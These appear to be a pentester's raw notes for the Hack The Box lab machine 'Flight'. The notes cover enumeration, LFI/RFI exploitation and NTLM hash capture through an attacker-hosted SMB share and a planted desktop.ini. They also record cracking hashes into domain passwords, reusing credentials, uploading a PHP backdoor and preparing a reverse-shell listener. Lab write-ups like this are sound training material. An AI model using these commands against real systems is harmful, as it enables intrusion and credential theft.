2023-03-17 14:11:46 EDT -- START TIME

# Flight
----------------------------------------
|================================================================
- Name: g0.flight.htb
- IP Address: 10.10.11.187 
- OS: Windows 10.0 Build 17763 x64
- Notes:

//CREDS:
// flight.htb\svc_apache	: S@Ss!K@*t13
// flight.htb\S.Moon 		: S@Ss!K@*t13
// flight.htb\c.bum			: Tikkycoll_431012284

//FLAGS:
//User:		eed322aedd8336099702d428a3facdc
//System: 
|================================================================
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// nmap --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-17 14:15:53 EDT -- 
// SCAN
ip=10.10.11.187
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

echo $ports
//53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49667,49673,49674,49696,49725

2023-03-17 14:21:18 EDT -- 
nmap -e tun0 -Pn -A --script=default,vuln -p$ports $ip -oN vuln.nmap


# UDP scan
2023-03-17 14:22:00 EDT -- 
sudo nmap -e tun0 -Pn -sU --top-ports 100 $ip -oN udp.nmap

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// 445/tcp   open  microsoft-ds
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// crackmapexec smb
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-17 14:45:17 EDT -- 
// test NULL session access
crackmapexec smb 10.10.11.187 -u '' -p '' --shares
//[-] Error enumerating shares: STATUS_ACCESS_DENIED


2023-03-17 14:45:50 EDT -- 
// test guest user access
crackmapexec smb 10.10.11.187 -u guest -p '' --shares
//[-] flight.htb\guest: STATUS_ACCOUNT_DISABLED
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// 80/tcp Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// gobuster --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
// directory brute force
2023-03-17 15:01:49 EDT -- 
gobuster dir -u http://10.10.11.187 -w /usr/share/dirb/wordlists/common.txt -x php,txt,html,htm,asp,aspx -o gobuster-80.txt

egrep 'Status: 3..' gobuster-80.txt
/css     (Status: 301) [Size: 334] [--> http://10.10.11.187/css/]
/images  (Status: 301) [Size: 337] [--> http://10.10.11.187/images/]
/js      (Status: 301) [Size: 333] [--> http://10.10.11.187/js/]

egrep 'Status: 2..' gobuster-80.txt
/index.html           (Status: 200) [Size: 7069]

// vhost brute force
//vhost	Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)

-- add /etc/hosts file entries --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

# add /etc/hosts entry nix
sudo sh -c "echo '10.10.11.187 g0.flight.htb flight.htb' >> /etc/hosts"
cat /etc/hosts

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

2023-03-17 15:49:35 EDT -- 
gobuster vhost -u flight.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

//Found: school.flight.htb Status: 200 [Size: 3996]
//Add school.flight.htb to /etc/hosts
10.10.11.187 g0.flight.htb school.flight.htb
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// nikto -- 
//Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
// scan website
2023-03-17 15:01:57 EDT -- 
nikto -h http://10.10.11.187 -o nikto_scan.txt

+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.

2023-03-17 16:02:35 EDT -- 
nikto -h http://school.flight.htb -o nikto_scan_school.txt

+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /styles/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// Testing Website
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
http://school.flight.htb/index.php?view=home.html

//https://www.url-encode-decode.com/
c:/windows/system32/drivers/etc/hosts
c%3A%2Fwindows%2Fsystem32%2Fdrivers%2Fetc%2Fhosts

c:\windows\system32\drivers\etc\hosts
c%3A%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts

//Testing LFI w/ Forward Slashes
http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts
//Success!!
http://school.flight.htb/index.php?view=c%3A%2Fwindows%2Fsystem32%2Fdrivers%2Fetc%2Fhosts
//Sucess!!

//Testing LFI w/ Backward Slashes
http://school.flight.htb/index.php?view=c:\windows\system32\drivers\etc\hosts
//Suspicious Activity Blocked!
http://school.flight.htb/index.php?view=c%3A%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chost
//Suspicious Activity Blocked!

//Testing RFI
echo 'CanUSeeMeh?' > test.txt
python3 -m http.server 443

2023-03-17 16:27:04 EDT -- 
http://school.flight.htb/index.php?view=http://10.10.16.43:443/test.txt
//Success!!!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


//RFI
// Webshell [Didn't work, but got a hash from NTML SMB relay]
//Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
//Using a PHP webshell since that know as installed 
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

python3 -m http.server 443

webshells
cd php
cp simple-backdoor.php ~/haxterm/data/10.10.11.187

2023-03-17 16:44:39 EDT -- 
//Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
http://school.flight.htb/index.php?view=http://10.10.16.43:443/simple-backdoor.php?cmd=whoami
//Script did not work
http://school.flight.htb/index.php?view=http://10.10.16.43:443/simple-backdoor.php&cmd=whoami
//Script did not work


//Trying SMB
2023-03-17 16:50:09 EDT -- 
impacket-smbserver -smb2support PUBLIC .
http://school.flight.htb/index.php?view=//10.10.16.43/Public/simple-backdoor.php?cmd=dir
//Webshell didn't work, but got a hash for svc_apache

svc_apache::flight:aaaaaaaaaaaaaaaa:22ac14268efce9a7ae22e78d8f173193:010100000000000000fc08dc1259d90122997d295a2ddb3500000000010010004b0071006e0049004c004a0077004200030010004b0071006e0049004c004a00770042000200100062005900660053004d0077006c0065000400100062005900660053004d0077006c0065000700080000fc08dc1259d90106000400020000000800300030000000000000000000000000300000660acabb16f78a854fc8679c09e76fd09b0c725c62718f32bf914c33a23c382d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00340033000000000000000000

2023-03-17 17:00:16 EDT -- 
john --wordlist=/usr/share/wordlists/rockyou.txt svc_apache.hash
// S@Ss!K@*t13      (svc_apache)

//Test Creds:
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13'
[+] flight.htb\svc_apache:S@Ss!K@*t13
//Success!!

2023-03-17 17:02:43 EDT -- 
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --shares
Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
Shared          READ            
SYSVOL          READ            Logon server share 
Users           READ            
Web             READ

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// SMBClient
//flight.htb\svc_apache:S@Ss!K@*t13
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-17 17:09:15 EDT -- 
impacket-smbclient 'flight.htb/svc_apache:S@Ss!K@*t13@10.10.11.187'
# info
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
# who
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
Users
Web

# use C$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

# use Shared
# ls
drw-rw-rw-          0  Fri Mar 17 17:06:27 2023 .
drw-rw-rw-          0  Fri Mar 17 17:06:27 2023 ..

# use Users
# ls
drw-rw-rw-          0  Fri Mar 17 17:23:11 2023 .
drw-rw-rw-          0  Fri Mar 17 17:23:11 2023 ..
drw-rw-rw-          0  Thu Sep 22 15:28:03 2022 .NET v4.5
drw-rw-rw-          0  Thu Sep 22 15:28:02 2022 .NET v4.5 Classic
drw-rw-rw-          0  Fri Mar 17 17:23:18 2023 abc123
drw-rw-rw-          0  Fri Mar 17 17:26:05 2023 Administrator
drw-rw-rw-          0  Tue Jul 20 16:19:19 2021 All Users
drw-rw-rw-          0  Thu Sep 22 16:08:23 2022 C.Bum
drw-rw-rw-          0  Tue Jul 20 15:20:24 2021 Default
drw-rw-rw-          0  Tue Jul 20 16:19:19 2021 Default User
-rw-rw-rw-        174  Tue Jul 20 16:17:23 2021 desktop.ini
drw-rw-rw-          0  Tue Jul 20 15:23:25 2021 Public
drw-rw-rw-          0  Fri Oct 21 14:50:21 2022 svc_apache

# cd abc123
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# cd Administrator
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# cd C.Bum
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

# cd svc_apache
# ls Desktop\*
drw-rw-rw-          0  Thu Sep 22 16:16:56 2022 .
drw-rw-rw-          0  Thu Sep 22 16:16:56 2022 ..

# cd AppData\Local\Temp
# ls
drw-rw-rw-          0  Fri Mar 17 17:07:52 2023 .
drw-rw-rw-          0  Fri Mar 17 17:07:52 2023 ..
# put test.txt
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

//Can't seem to upload files

# use Web
# ls
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 .
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 ..
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 flight.htb
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 school.flight.htb

# cd flight.htb
# ls
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 .
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 ..
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 css
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 images
-rw-rw-rw-       7069  Fri Mar 17 17:26:05 2023 index.html
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 js

# put test.txt
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

# cd school.flight.htb
# put test.txt
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// ldapdomaindump
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-17 17:46:06 EDT -- 
// execute
ldapdomaindump -o ldap_dump -u 'flight.htb\svc_apache' -p 'S@Ss!K@*t13' ldaps://10.10.11.187
//[Errno 104] Connection reset by peer

2023-03-17 17:48:10 EDT -- 
ldapdomaindump -o ldap_dump -u 'flight.htb\svc_apache' -p 'S@Ss!K@*t13' ldap://10.10.11.187

firefox-esr ldap_dump/domain_users.html
//Users of interest, that have logged on box before
//abc123	abc123	abc123	Domain Admins
//C.Bum	C.Bum	C.Bum	WebDevs
//Administrator	Administrator	Administrator	Group Policy Creator Owners, Domain Admins, Enterprise Admins, Schema Admins, Administrators

firefox-esr domain_policy.html
//Machine Account Quota: 0

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// CrackMap Enum
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

//Create User List
cut -f1 ldap_dump/domain_users.grep | egrep -v cn > users.lst

//Test Cred-Reuse
2023-03-17 18:03:26 EDT -- 
crackmapexec smb 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' --continue-on-success
[+] flight.htb\svc_apache:S@Ss!K@*t13
[+] flight.htb\S.Moon:S@Ss!K@*t13

//S.Moon w/CredReuse Junior Web Developer

2023-03-17 18:06:43 EDT -- 
crackmapexec winrm 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' --continue-on-success
//Nothing

2023-03-17 18:06:57 EDT -- 
crackmapexec rdp 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' --continue-on-success
//Nothing

2023-03-17 18:08:50 EDT -- 
crackmapexec smb 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' -M zerologon
//Nothing

2023-03-17 18:19:02 EDT -- 
crackmapexec smb 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' -M petitpotam

//PETITPOT... 10.10.11.187    445    G0               VULNERABLE
//PETITPOT... 10.10.11.187    445    G0               Next step: https://github.com/topotam/PetitPotam

2023-03-17 18:19:32 EDT -- 
crackmapexec smb 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' -M nopac

KRB_AP_ERR_SKEW(Clock skew too great)

// fix clock skew if necessary (UDP to NTP port)
- - - - - - - - - - - - - - -
// install ntpdate
sudo apt install -y ntpdate

// update the local kali time
sudo watch -n 1 "ntpdate -b -u 10.10.11.187"
- - - - - - - - - - - - - - -

crackmapexec smb 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' -M nopac
//Nothing

2023-03-17 18:32:21 EDT -- 
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' -x whoami
crackmapexec smb 10.10.11.187 -u S.Moon -p 'S@Ss!K@*t13' -x whoami
//Nothing

2023-03-17 18:33:04 EDT -- 
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' -X '$PSVersionTable'
crackmapexec smb 10.10.11.187 -u S.Moon -p 'S@Ss!K@*t13' -X '$PSVersionTable'
//Nothing, not PWNED
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// SMBClient
//flight.htb\S.Moon:S@Ss!K@*t13
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-18 03:40:31 EDT -- 
impacket-smbclient 'flight.htb/svc_apache:S@Ss!K@*t13@10.10.11.187'
# info
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
# who
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
Users
Web

# use ADMIN$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

# use C$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

# use Shared
# ls
drw-rw-rw-          0  Fri Mar 17 17:06:27 2023 .
drw-rw-rw-          0  Fri Mar 17 17:06:27 2023 ..

# use Users
drw-rw-rw-          0  Thu Sep 22 16:16:56 2022 .
drw-rw-rw-          0  Thu Sep 22 16:16:56 2022 ..
drw-rw-rw-          0  Thu Sep 22 15:28:03 2022 .NET v4.5
drw-rw-rw-          0  Thu Sep 22 15:28:02 2022 .NET v4.5 Classic
drw-rw-rw-          0  Mon Oct 31 14:34:00 2022 Administrator
drw-rw-rw-          0  Tue Jul 20 16:19:19 2021 All Users
drw-rw-rw-          0  Thu Sep 22 16:08:23 2022 C.Bum
drw-rw-rw-          0  Tue Jul 20 15:20:24 2021 Default
drw-rw-rw-          0  Tue Jul 20 16:19:19 2021 Default User
-rw-rw-rw-        174  Tue Jul 20 16:17:23 2021 desktop.ini
drw-rw-rw-          0  Tue Jul 20 15:23:25 2021 Public
drw-rw-rw-          0  Fri Oct 21 14:50:21 2022 svc_apache

# cd Administrator
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# cd C.Bum
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# cd svc_apache
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

# use Web
# ls
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 .
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 ..
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 flight.htb
drw-rw-rw-          0  Sat Mar 18 00:07:01 2023 school.flight.htb

# cd flight.htb
# ls
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 .
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 ..
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 css
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 images
-rw-rw-rw-       7069  Fri Mar 17 17:26:05 2023 index.html
drw-rw-rw-          0  Sat Mar 18 00:22:01 2023 js

# put test.txt
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

# cd school.flight.htb
# put test.txt
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.

//No priv to put files on disk as svc_apache OR S.Moon
//Research is needed to continue

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// CrackMap Creds
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-17 18:38:23 EDT -- 
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --sam
crackmapexec smb 10.10.11.187 -u S.Moon -p 'S@Ss!K@*t13' --sam
//Nothing

2023-03-17 18:38:39 EDT -- 
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --lsa
crackmapexec smb 10.10.11.187 -u S.Moon -p 'S@Ss!K@*t13' --sam
//Nothing

2023-03-17 18:38:49 EDT -- 
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --ntds
crackmapexec smb 10.10.11.187 -u S.Moon -p 'S@Ss!K@*t13' --ntds
//[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
//[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.

2023-03-17 18:40:24 EDT -- 
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --ntds vss
crackmapexec smb 10.10.11.187 -u S.Moon -p 'S@Ss!K@*t13' --ntds
//Nothing

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// CrackMap LDAP
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
sudo watch -n 1 "ntpdate -b -u 10.10.11.187"

2023-03-17 18:46:20 EDT -- 
crackmapexec ldap 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' -k --continue-on-success
//Nothing

//Testing Creds
crackmapexec ldap 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' --continue-on-success
//[+] flight.htb\svc_apache:S@Ss!K@*t13
//[+] flight.htb\S.Moon:S@Ss!K@*t13

//ASREPRoast
2023-03-18 01:49:47 EDT -- 
crackmapexec ldap 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' --asreproast asreproast.out --continue-on-success
//No entries found!

2023-03-18 01:56:23 EDT -- 
crackmapexec ldap 10.10.11.187 -u users.lst -p 'S@Ss!K@*t13' --kerberoasting kereroasting.out --continue-on-success
//No entries found!

2023-03-18 01:56:26 EDT -- 
crackmapexec ldap 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --trusted-for-delegation
//G0$

2023-03-18 01:56:44 EDT -- 
crackmapexec ldap 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --admin-count
[+] flight.htb\svc_apache:S@Ss!K@*t13 
Administrator
Administrators
Print Operators
Backup Operators
Replicator
krbtgt
Domain Controllers
Schema Admins
Enterprise Admins
Domain Admins
Server Operators
Account Operators
Read-only Domain Controllers
Key Admins
Enterprise Key Admins
abc123

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


-- impacket-remote_execution --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-17 22:34:06 EDT -- 
impacket-psexec 'flight.htb/svc_apache:S@Ss!K@*t13@10.10.11.187'
//No writable shares

impacket-psexec 'flight.htb/S.Moon:S@Ss!K@*t13@10.10.11.187'

[*] Found writable share Shared
[*] Uploading file HKDVfvsr.exe
[-] Error uploading file HKDVfvsr.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

2023-03-17 21:16:24 EDT -- 
crackmapexec smb 10.10.11.187 -u S.Moon -p 'S@Ss!K@*t13' --shares
Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
Shared          READ,WRITE      
SYSVOL          READ            Logon server share 
Users           READ            
Web             READ

//Shared          READ,WRITE
//svc_apache only had read rights on ALL shares

2023-03-18 02:05:54 EDT -- 
impacket-smbexec 'flight.htb/svc_apache:S@Ss!K@*t13@10.10.11.187'
impacket-smbexec 'flight.htb/S.Moon:S@Ss!K@*t13@10.10.11.187'
//[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

2023-03-18 02:07:37 EDT -- 
impacket-atexec 'flight.htb/svc_apache:S@Ss!K@*t13@10.10.11.187' whoami
impacket-atexec 'flight.htb/S.Moon:S@Ss!K@*t13@10.10.11.187' whoami
//[-] rpc_s_access_denied

2023-03-18 02:09:31 EDT -- 
impacket-wmiexec 'flight.htb/svc_apache:S@Ss!K@*t13@10.10.11.187'
impacket-wmiexec 'flight.htb/S.Moon:S@Ss!K@*t13@10.10.11.187' whoami
//[-] rpc_s_access_denied

2023-03-18 02:10:22 EDT -- 
impacket-dcomexec 'flight.htb/svc_apache:S@Ss!K@*t13@10.10.11.187'
impacket-dcomexec 'flight.htb/S.Moon:S@Ss!K@*t13@10.10.11.187'
//[-] rpc_s_access_denied

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// Steal NTLM creds
//https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
//flight.htb\c.bum:Tikkycoll_431012284
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// ntlm_theft
//[*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
wget https://raw.githubusercontent.com/Greenwolf/ntlm_theft/master/ntlm_theft.py

//Desktop.ini
python3 ntlm_theft.py -g desktopini -s 10.10.16.43 -f gh05t

mv gh05t/desktop.ini .

cat desktop.ini 
[.ShellClassInfo]
IconResource=\\10.10.16.43\aa

//Start smb server to catch NTLM hash
impacket-smbserver -smb2support PUBLIC .

2023-03-17 22:34:19 EDT -- 
put desktop.ini

//Waited for the "User" to use desktop.ini

c.bum::flight.htb:aaaaaaaaaaaaaaaa:cdc43975d09dc5f8d4a9465408617119:010100000000000080417b4c4259d901973cbf96877bcb8c000000000100100058004a0059004b00710066004c0047000300100058004a0059004b00710066004c004700020010006c006a00560050007900680077004d00040010006c006a00560050007900680077004d000700080080417b4c4259d90106000400020000000800300030000000000000000000000000300000c46bfdd14259b4766263c8fff7da24508a1ede457a6e87a6ca4f888001a5ffc60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00340033000000000000000000

echo 'c.bum::flight.htb:aaaaaaaaaaaaaaaa:cdc43975d09dc5f8d4a9465408617119:010100000000000080417b4c4259d901973cbf96877bcb8c000000000100100058004a0059004b00710066004c0047000300100058004a0059004b00710066004c004700020010006c006a00560050007900680077004d00040010006c006a00560050007900680077004d000700080080417b4c4259d90106000400020000000800300030000000000000000000000000300000c46bfdd14259b4766263c8fff7da24508a1ede457a6e87a6ca4f888001a5ffc60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00340033000000000000000000' > c.bum.hash

2023-03-17 22:41:55 EDT -- 
john --wordlist=/usr/share/wordlists/rockyou.txt c.bum.hash
//Tikkycoll_431012284 (c.bum)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


//Test Creds:
2023-03-17 22:48:08 EDT -- 
crackmapexec smb 10.10.11.187 -u c.bum -p 'Tikkycoll_431012284'
[+] flight.htb\c.bum:Tikkycoll_431012284
//Success!!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

## NOTE: Based on ldap dump c.bum is a Senior Web Developer

// SMBClient
//flight.htb\c.bum:Tikkycoll_431012284
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
2023-03-17 22:53:23 EDT -- 
crackmapexec smb 10.10.11.187 -u c.bum -p 'Tikkycoll_431012284' --shares
Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
Shared          READ,WRITE      
SYSVOL          READ            Logon server share 
Users           READ            
Web             READ,WRITE

2023-03-17 22:54:00 EDT -- 
impacket-smbclient 'flight.htb/c.bum:Tikkycoll_431012284@10.10.11.187'

# info
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
# who
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
Users
Web

# use Users
# ls C.Bum\Desktop\*
-rw-rw-rw-         34  Sat Mar 18 02:29:54 2023 user.txt

# get C.Bum\Desktop\user.txt

2023-03-17 23:15:39 EDT -- 
cat user.txt   
//eed322aedd8336099702d428a3facdc


// WebShell Creation
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
//Test File Upload
use Web

drw-rw-rw-          0  Sat Mar 18 06:12:01 2023 flight.htb
drw-rw-rw-          0  Sat Mar 18 06:14:17 2023 school.flight.htb

cd school.flight.htb
put test.txt
//-rw-rw-rw-         12  Sat Mar 18 06:14:17 2023 test.txt
//Success!! (http://school.flight.htb/test.txt)

//File gets wiped after a bit of time

webshells
cd php
cp simple-backdoor.php ~/haxterm/data/10.10.11.187/backdoor.php

2023-03-17 23:25:24 EDT -- 
put backdoor.php

2023-03-17 23:38:19 EDT -- 
curl -k 'http://school.flight.htb/backdoor.php?cmd=whoami'
//flight\svc_apache

2023-03-17 23:56:59 EDT -- 
curl -k 'http://school.flight.htb/backdoor.php?cmd=powershell.exe%20$PSVersionTable'
Name                           Value                                                                                   
----                           -----                                                                                   
PSVersion                      5.1.17763.2931                                                                          
PSEdition                      Desktop                                                                                 
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}                                                                 
BuildVersion                   10.0.17763.2931                                                                         
CLRVersion                     4.0.30319.42000                                                                         
WSManStackVersion              3.0                                                                                     
PSRemotingProtocolVersion      2.3                                                                                     
SerializationVersion           1.1.0.1

//Success!!!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// Rev-Shell
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
sudo rlwrap -cAr nc -lvnp 443

